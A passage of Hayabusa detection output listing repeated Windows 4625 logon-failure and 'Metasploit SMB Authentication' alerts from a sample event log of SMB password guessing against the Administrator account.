NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ww9HMQX0cqmolYQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJRRZ5e9lARVZDar : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvUzVoSLqFPAXSWE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SMMgPu1VJIjAWPDW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1JjIa4nOKDTLuAD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0J0GJIm1UUXHH9QJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: YmVX3xIz0hrQFvPr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nv4tKFEmHjiXkVDI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esdHHJl9LBek9pIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MWofwwLjwiyBk39P : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dvsHFZe7Z1uJ9Dkv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8aDdgwvb1zsZF79k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AQUb6CnMUtyrMNhF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KP5OxHPsbLHnIUBE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ysg903vYFhQHYvFJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IySarHtsTvwSP56H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: GnUy8tbCIAVnmhDg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bfBtc4MnMtPG6MpC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37b8MGIHY8QwXf9K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eDuaWikplDmJNmIE : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0kSSoAYJILHCPI7K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9ikrtTGcZYU1556 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ypyd6SagvUXQHhtZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWS37lIJ3Q6ghgMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H211KmFImpBRwTGW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 64tO5iBehXQcNc49 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: xvxDngRj3j5TAwST : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O8VYRjMnxDgUTWYf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhWphTesbUf0hwi1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MO8VRRVANxIkDzEX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ziSXANiDAf7LRFz5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g0CvYYtyEcU2riBX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tPg2LKgWMeM0Oqo0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbzL9T2d4RdeCz4q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PeEfbWpoipfYtOKv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RKJW1vSrIAbRTzyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: aU4G8NBru22Vc4Cl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sacBcqxV97FUihrd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 41Ms0lEMeT0jYxYj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkQWVEHGM1NxowR0 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4qKqRY7L2IQRoU57 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eMIkvwbvqc9V6CFs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PehzjCnK42ZPUE7e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1fqw2GWiYfO0kU83 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WFPJJNCFdPJl4igl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zc6CrAr7YoozKB6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
